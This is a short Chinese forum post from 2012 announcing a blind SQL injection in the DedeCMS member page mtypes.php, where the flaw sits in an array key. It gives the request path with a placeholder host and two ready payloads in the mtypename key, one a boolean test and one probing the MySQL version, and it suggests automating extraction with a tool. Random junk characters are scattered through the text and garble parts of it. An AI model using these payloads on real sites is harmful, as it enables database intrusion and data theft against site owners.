需要magic_quotes_gpc = Off,所以说是鸡肋啊.
: V4 |$ g; J( j. y _9 ?
1 c3 |5 y" F& m
; n# ^ g. f/ n, g( s发生在数组key里的注射漏洞,有点意思.- v/ Z+ o% Z# J" A
5 L, ]/ L0 r6 z
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
+ d) O9 {- B+ O
8 O. ` N$ H! M3 H+ B2 ~( {http://www.xxx.com /dede/member/mtypes.php?dopost=save
- X1 v- _ |% S7 j3 b
# w6 H1 G6 ~- o; H4 `. I# texploit:# a# D% h3 P$ v! k) P
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r/ T \0 B, I. A. }( K: F$ b5 A& o
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
" j4 n. k" b* k0 O/ V0 \ |
发表于 2012-12-20 08:08:09
收藏
支持
反对